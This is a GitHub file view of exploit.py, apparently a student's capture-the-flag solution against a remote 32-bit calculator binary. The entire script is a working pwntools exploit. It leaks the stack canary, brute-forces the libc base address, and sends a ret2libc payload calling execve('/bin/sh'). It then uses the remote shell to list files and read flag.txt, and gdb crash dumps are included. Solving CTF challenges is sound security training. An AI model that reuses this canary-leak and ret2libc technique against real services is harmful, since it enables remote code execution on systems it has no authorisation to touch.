-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
174 lines (136 loc) · 5.01 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
# exploit.py Piotr Szulc 347277
import struct
import pickle
import os
import time
from pwn import *
server = 'h4x.0x04.net'
port = 1337
'''
*** stack smashing detected ***: ./calc-easy terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb7650773]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb76e09b5]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfc96a)[0xb76e096a]
./calc-easy(+0xb24)[0xb77c4b24]
./calc-easy(+0xa21)[0xb77c4a21]
./calc-easy(+0xa93)[0xb77c4a93]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb75fda63]
./calc-easy(+0x5c1)[0xb77c45c1]
======= Memory map: ========
'''
# I need to get offset of __libc_start_main (check above) and other offsets
def offsets():
libc_elf = ELF('libc-2.19.so')
execve_offset = libc_elf.symbols['execve']
log.info('offset of execve: ' + hex(execve_offset)) # 0xb7330
binsh_offset = list(libc_elf.search('/bin/sh'))[0]
log.info('offset of binsh: ' + hex(binsh_offset)) # 0x15f551
for k, v in libc_elf.symbols.items():
if 'libc_start_main' in k:
log.info('libc_start_main offset: ' + hex(v)) # 0x19970
# offsets()
libc_start_main_offset = 0x19970
additional_offset = 0xf3
execve_offset = 0xb7330
binsh_offset = 0x15f551
libc_addresses_file = 'libc_addresses'
# Statistical approach - since task is based on 32 bit arch
# I thought only 4096 libc base addresses would be possible (after 5 tries and checking out pattern)
# However function below showed that after 10000 tries i got only
# 256 different libc base addresses. all equally likely [rozklad.png]
# brute force seems like easiest idea - EX = 256 tries
# (idea from: http://www.pwntester.com/blog/2013/12/30/fusion-level02-write-up/)
def sample_libc_addresses_from_server():
libc_addresses = []
for i in range(10000):
p = connect(server,port)
p.sendline(33*'('+ 32*')')
reply = p.recvlines(10)[-1][-11:-1]
libc_address = hex(int(reply, 16)- libc_start_main_offset - additional_offset)
libc_addresses.append(libc_address)
log.info(str(i) + ": " + str(libc_address))
p.close()
with open(libc_addresses_file, 'wb') as fp:
pickle.dump(libc_addresses, fp)
#sample_libc_Addresses_from_server()
default_libc_base_address_guess = '0xb75ce000' # first address taken from sampling libc addresses from server above
def get_libc_addresses():
if os.path.isfile(libc_addresses_file):
with open (libc_addresses_file, 'rb') as fp:
return list(set(pickle.load(fp)))
return [default_libc_base_address_guess]
libc_addresses = get_libc_addresses()
libc_addr = int(libc_addresses[0], 16)
execve_addr = libc_addr+ execve_offset
binsh_addr = libc_addr + binsh_offset
log.info('Guessing addresses:')
log.info('libc address: ' + str(libc_addr) + ' [hex: ' + hex(libc_addr) + ']')
log.info('execve_addr: ' + str(execve_addr))
log.info('binsh_addr: ' + str(binsh_addr))
# Getting canary
# [32*token][32*value][canary]
# move SP to position 33 then using ')' we invoke:
# 'value[sp-1] = value[sp];'
def get_cannary():
payload = 32*'(' + 31*')'
p.sendline(payload)
canary = p.recvline()
log.info('Got canary: ' + canary)
return canary
# after 1000 tries of different combinations of payload
'''
gdb-peda$ r
Starting program: /root/Pobrane/calc/calc-easy
(((((((((((((((((((((((((((((((()))))))))))))))))))))))))))))))
1348214784
(1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1348214784+1+2+3+4+5+6+7+9+10(
WTF?
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x80002000 --> 0x1ef4
ECX: 0x0
EDX: 0x5
ESI: 0x0
EDI: 0x1
EBP: 0xbffffbf8 --> 0x0
ESP: 0xbffffbf0 --> 0xbffffc10 --> 0x1
EIP: 0x2
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x2
'''
def get_payload(canary):
payload = '(' + 15*'0+'
payload += str(canary)[0:-1]
payload += '+0+'
payload += ('').join(map(lambda x : '('+ str(x) + ')', [execve_addr, 0, binsh_addr, 0 , 0]))
payload += '('
return payload
trial = 0
start_time = time.time()
# Main brute force loop;
while True:
p = connect(server, port)
canary = get_cannary()
if int(canary) < 0:
p.close()
else:
trial += 1
log.info('Trial #' + str(trial))
p.sendline(get_payload(canary))
p.recvline(1)
p.sendline('ls -la')
try:
response = ('\n').join(p.recvlines(20, timeout=3))
print response
if 'flag.txt' in response:
p.sendline('cat flag.txt')
print '**************************FLAG****************************************'
print p.recvline()
print("--- time taken %s seconds ---" % (time.time() - start_time))
exit(0)
except EOFError:
pass
p.close()